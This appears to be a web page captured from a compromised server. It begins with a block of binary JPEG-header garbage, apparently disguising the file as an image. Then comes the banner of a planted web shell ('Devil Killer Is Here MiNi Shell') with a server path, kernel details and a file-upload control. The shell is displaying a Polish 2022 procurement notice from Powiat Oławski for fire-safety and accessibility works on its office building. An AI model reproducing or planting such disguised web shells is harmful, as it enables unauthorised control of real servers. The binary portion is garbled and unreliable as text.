JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220907/0033698101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Dostosowanie budynku Starostwa do przepisów p. poż. <br/>i potrzeb osób niepełnosprawnych&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Oławski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934727</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@starostwo.olawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starostwo.olawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostosowanie budynku Starostwa do przepisów p. poż. <br/>i potrzeb osób niepełnosprawnych&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f90dfead-2e87-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00336981</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021215/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Dostosowanie budynku Starostwa do przepisów p.poż. i potrzeb osób niepełnosprawnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://app.sidaspzp.pl/panel/zamawiajacy/zamowienia?limit=10&amp;offset=0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.sidaspzp.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie <br/>w formie elektronicznej przy użyciu środków komunikacji elektronicznej za <br/>pośrednictwem Platformy dostępnej bezpłatnie pod adresem <br/>https://zamowienia.sidaspzp.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">7.	Ochrona danych osobowych.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.	administratorem danych osobowych Wykonawcy będącego osobą fizyczną jest:<br/>Zdzisław Brezdeń - Starosta Oławski<br/>Adres: ul. 3 Maja 1, 55-200 Oława<br/>Adres poczty elektronicznej: info@starostwo.olawa.pl<br/>Numer telefonu:	(71) 301 15 22<br/>Numer faksu:	(71) 301 15 62<br/>2.	kontakt z inspektorem ochrony danych osobowych w Starostwie Powiatowym <br/>w Oławie ul. 3 Maja 1, 55-200 Oława, tel: 71 301 15 33, e-mail: iod@starostwo.olawa.pl <br/>3.	dane osobowe wykonawcy będącego osobą fizyczną przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego IZP.272.48.2022 „Dostosowanie budynku Starostwa do przepisów p. poż. i potrzeb osób niepełnosprawnych”.<br/>4.	Odbiorcami danych osobowych Wykonawcy będącego osobą fizyczną, będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych;<br/>5.	Dane osobowe Wykonawcy będącego osobą fizyczną, będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.	Obowiązek podania przez Wykonawcę będącego osobą fizyczną, danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7.	W odniesieniu do danych osobowych Wykonawcy będącego osobą fizyczną, decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.	Wykonawca będący osobą fizyczną posiada:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania danych osobowych dotyczących Wykonawcy;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>9. Nie przysługuje Wykonawcy będącemu osobą fizyczną:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.272.48.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja robót budowlanych dot. zadania pn. „Dostosowanie budynku Starostwa do przepisów p. poż. i potrzeb osób niepełnosprawnych”.<br/>2.	Zakres zamówienia obejmuje m.in.: <br/>a)	wykonanie robót budowlanych zgodnie z umową, decyzją o pozwoleniu na budowę i dokumentacją projektową,<br/>b)	przygotowanie i przekazanie Zamawiającemu kompletu dokumentów koniecznych do złożenia wniosku o zakończeniu robót.<br/>3.	Szczegółowe określenie przedmiotu zamówienia zawiera dokumentacja projektowa pn. „PRZEBUDOWA BUDYNKU STAROSTWA POWIATOWEGO W CELU DOSTOSOWANIA DO PRZEPISÓW PRZECIWPOŻAROWYCH” opracowana przez Pracownię Projektową Wojciech Robak, ul. Polna 41, <br/>63-700 Krotoszyn.<br/>4.	Zamawiający zaznacza, iż zamówienie nie obejmuje całego zakresu wskazanego w w/w dokumentacji projektowej.<br/>5.	Zakres zamówienia obejmuje:<br/>5.1.	Demontaż istniejącej bezklasowej ślusarki drzwiowej w obrębie klatek schodowych ( klatka K1 i klatka K2) w budynku głównym Starostwa.<br/>5.2.	Montaż drzwi ppoż. do pomieszczeń biurowych na klatkach schodowych (K1 i K2) budynku głównego Starostwa.<br/>5.3.	Demontaż istniejącej bezklasowej ślusarki okiennej w obrębie klatek schodowych ( klatka K1 i klatka K2) w budynku głównym Starostwa<br/>5.4.	Montaż, na klatkach schodowych (K1 i K2), okien oddymiających <br/>o pow. oddymiania 5% powierzchni rzutu klatek schodowych wraz <br/>z podłączeniem ich do systemu oddymiania.<br/>6.	Zakres zamówienia wskazany jest również w przedmiarze robót (poz. 13,15,17,19,21,22,23,25,26,27,29,30,32,34,36,37,38,39,41,43,45,46,48,50,52,53,54,55,57,58,59,61,62,64,66,68,69,70,71,73,74,75,77,78,79,80(oprócz OKN 02),81,82( oprócz OKN 02),83,84,85,86,87,88,89,90). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">44221220-3 - Drzwi przeciwpożarowe</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przygotowując ofertę Wykonawcy mają obowiązek zapoznać się <br/>z załącznikami opisującymi przedmiot zamówienia tj. SWZ, dokumentacją <br/>projektową<br/>2. Cena oferty, a dalej wynagrodzenie wykonawcy mają charakter ryczałtowy <br/>zgodnie z art. 629 ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny <br/>(Dz.U.2022 poz. 1360). Cena oferty winna być wyrażona w złotych polskich <br/>(PLN).<br/>3. Wykonawca w cenie oferty winien ująć wszystkie koszty niezbędne do <br/>wykonania przedmiotu umowy wynikające z opisu przedmiotu zamówienia, <br/>związane z prowadzeniem robót budowalnych włączając w to m. in.: koszty <br/>ubezpieczenia, koszty przeprowadzenia wszelkich badań oraz prób, <br/>sprawdzeń, pomiarów, ekspertyz, przyłączeń, próbną eksploatację oraz <br/>rozruch urządzeń i maszyn przewidzianych w dokumentacji projektowej, <br/>dokumentację powykonawczą, sprzątanie, zabezpieczenie pomieszczeń itp. <br/>4. Wszystkie ceny i wartości należy podać z dokładnością do dwóch miejsc po <br/>przecinku. <br/>5. Cenę oferty należy obliczyć jako sumę cen netto wraz z odpowiednią stawką <br/>podatku Vat robót budowlanych oraz innych składowych dotyczących <br/>wykonania prac. <br/>Nr postępowania IZP.272.48.2022 <br/>16<br/>6. Wykonawca, składając ofertę (na formularzu oferty stanowiącym Załącznik <br/>nr 1 do SWZ) informuje Zamawiającego, że wybór jego oferty będzie <br/>prowadził do powstania u Zamawiającego obowiązku podatkowego, <br/>wskazując: <br/>a) nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie <br/>będą prowadziły do powstania obowiązku podatkowego; <br/>b) wartość towaru lub usługi objętego obowiązkiem podatkowym <br/>Zamawiającego, bez kwoty podatku; <br/>c) stawkę podatku od towarów i usług, która zgodnie z wiedzą <br/>Wykonawcy, będzie miała zastosowanie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu w zakresie: <br/>- zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>- sytuacji ekonomicznej lub finansowej Wykonawcy: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>- Zdolność techniczna lub zawodowa. <br/>- Dysponowane osobami posiadającymi uprawnienie do kierowania <br/>robotami budowlanymi.<br/>Zamawiający uzna, że Wykonawca spełnia przedmiotowy warunek jeżeli <br/>wykaże, że dysponuje osobą posiadającą uprawnienia budowlane do <br/>kierowania robotami budowlanymi w specjalności konstrukcyjno - <br/>budowlanej bez ograniczeń lub odpowiadające im równoważne <br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/>- Posiadanie doświadczenia niezbędnego do wykonania przedmiotu <br/>zamówienia: <br/>Zamawiający uzna, że Wykonawca spełnia przedmiotowy warunek jeżeli <br/>wykaże, że: <br/>a) W okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli <br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał <br/>należycie co najmniej 1 zamówienie podlegające na <br/>budowie/przebudowie/remoncie budynku mieszkalnego, zamieszkania <br/>zbiorowego lub użyteczności publicznej (zdefiniowanych w Rozporządzeniu <br/>Ministra Infrastruktury z dnia 12.04.2002 r. „w sprawie warunków <br/>technicznych jakim powinny odpowiadać budynki i ich usytuowanie” – Dz. <br/>U. z 2019 r. , poz. 1065, z późn. zm.) wraz z instalacjami o wartości robót <br/>co najmniej 100 000,00 zł. (słownie: sto tysięcy złotych brutto). <br/>b) W przypadku robót, których wartość została wyrażona w umowie w innej <br/>walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy <br/>zastosowaniu średniego kursu NBP na dzień zakończenia robót (w <br/>przypadku robót rozliczanych wyłącznie w walutach innych niż PLN). <br/>c) Uwaga: w celu spełnienia wymagań wynikających z treści art. 117 ust. 3 <br/>Pzp w sytuacji, gdy powyższy warunek będzie spełniony przez jednego ze <br/>Nr postępowania IZP.272.48.2022 <br/>10<br/>wspólników konsorcjum to ten wspólnik musi wykonać części robót <br/>budowlanych o wartości robót co najmniej 100 000,00 zł brutto (słownie: sto <br/>tysięcy złotych brutto). <br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp <br/>w sytuacji, gdy powyższy warunek będzie spełniony nie przez wykonawcę lub <br/>wspólnika konsorcjum, a przez „podmiot udostępniający zasoby wykonawcy (tzw. <br/>„podmiot trzeci”), to „podmiot” ten musi być podwykonawcą części robót <br/>budowlanych o wartości robót co najmniej 100 000,00 zł brutto (słownie: sto tysięcy <br/>złotych brutto). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym <br/>mowa w Rozdziale V pkt. 1.3 SWZ w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez zamawiającego – wg załącznika nr 6 do <br/>SWZ. <br/>Oświadczenie Wykonawcy o braku przynależności lub o przynależności do <br/>tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. <br/>o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275) z innym <br/>wykonawcą, który złożył ofertę wraz z dokumentami lub informacjami <br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy <br/>należącego do tej samej grupy kapitałowej – wg załącznika nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu wykonanych robót budowlanych wraz z podaniem ich rodzaju, <br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty <br/>budowlane zostały wykonane,– wg Załącznika nr 7 do SWZ. Do załącznika <br/>należy dołączyć dowody (referencje bądź inne dokumenty) potwierdzające, <br/>że roboty budowlane wyszczególnione w zał. nr 7 do SWZ zostały <br/>wykonane należycie<br/> wykazu osób – wg Załącznika nr 8 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>Wykonawcy występujący wspólnie ustanawiają pełnomocnika do <br/>reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego <br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie <br/>zamówienia publicznego. <br/>Jeżeli oferta Wykonawców występujących wspólnie została wybrana, <br/>Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia <br/>publicznego, kopii umowy regulującej współpracę tych Wykonawców. <br/> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, <br/>oświadczenie, o którym mowa w art. 128 ust. 1, PZP składa każdy <br/>z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przesłanki mogące mieć wpływ na zmiany w treści niniejszej umowy: <br/>1) Zmiany terminu zakończenia zamówienia: <br/>a) Spowodowane klęskami żywiołowymi - w tym przypadku termin <br/>zakończenia zamówienia zostanie przedłużony o liczbę dni trwania klęski <br/>i liczbę dni trwania naprawy szkód na budowie spowodowanych klęską <br/>żywiołową; <br/>b) Spowodowane warunkami atmosferycznymi uniemożliwiającymi <br/>prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, <br/>oraz dokonywanie odbiorów – w tym przypadku termin zakończenia <br/>zamówienia zostanie przedłużony o liczbę dni trwania warunków <br/>uniemożliwiających prowadzenie robót potwierdzone wpisem kierownika <br/>budowy w dzienniku budowy. <br/>2) Zmianach osobowych - zmiana osób przy pomocy których Wykonawca <br/>realizuje przedmiot umowy na inne spełniające warunki określone w SWZ. <br/>Nr postępowania IZP.272.48.2022 <br/>18<br/>W przypadku kierownika budowy wskazana osoba musi legitymować się <br/>doświadczeniem nie mniejszym, niż osoba wskazana w ofercie. 